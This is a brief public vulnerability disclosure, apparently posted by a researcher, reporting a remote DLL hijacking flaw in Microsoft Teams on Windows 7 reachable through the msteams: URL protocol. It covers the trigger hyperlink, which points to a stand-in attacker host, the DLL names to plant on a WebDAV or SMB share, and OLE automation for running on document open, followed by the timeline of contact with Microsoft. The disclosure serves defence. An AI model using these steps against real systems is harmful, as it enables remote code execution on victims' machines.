Microsoft Teams Instant Messenger application on Windows 7 SP1 fully patched is vulnerable to remote DLL loading / hijacking because :

a) The OS does not ship with the affected library(ies)
b) The Teams application does not provide the library(ies)

So, it performs a search according to the 'PATH' environment variable, including the directory where the application resides and the current working directory, therefore allowing attackers to remotely exploit the issue, through the registered URL protocol:

By eg. creating an Office document containing a hyperlink like "msteams:http://0wnm3.com/x.jpg" is enough to trigger the issue. (User needs to click it, or eg. use OLE objects that automates the action upon document opening). The file should be placed on a WebDAV or SMB share along a valid dll (with a 'DllMain' entry point) named "shcore.dll" or "wldp.dll" or "dcomp.dll" ... And even more. Notice the DLL must match the platform of Teams app (On Windows x64, by default Teams x64 is installed so the DLL must be x64 as well.)

Tested on Teams v.1.2.00.22654 (latest version) on Windows 7 / 2008 fully patched as of December 2019.


Note: Microsoft was contacted on September 21, 2019.

Replied on the same day with an automated message, saying I would be contacted when the case was reviewed.

Usually in a week or so they reply saying whether they reproced or not and/or whether it will be patched or not.


On December, 10, 2019, I replied to the thread asking for feedback. No feedback received until December, 15, so I decided to go public.


  *   Eduardo Braun Prado.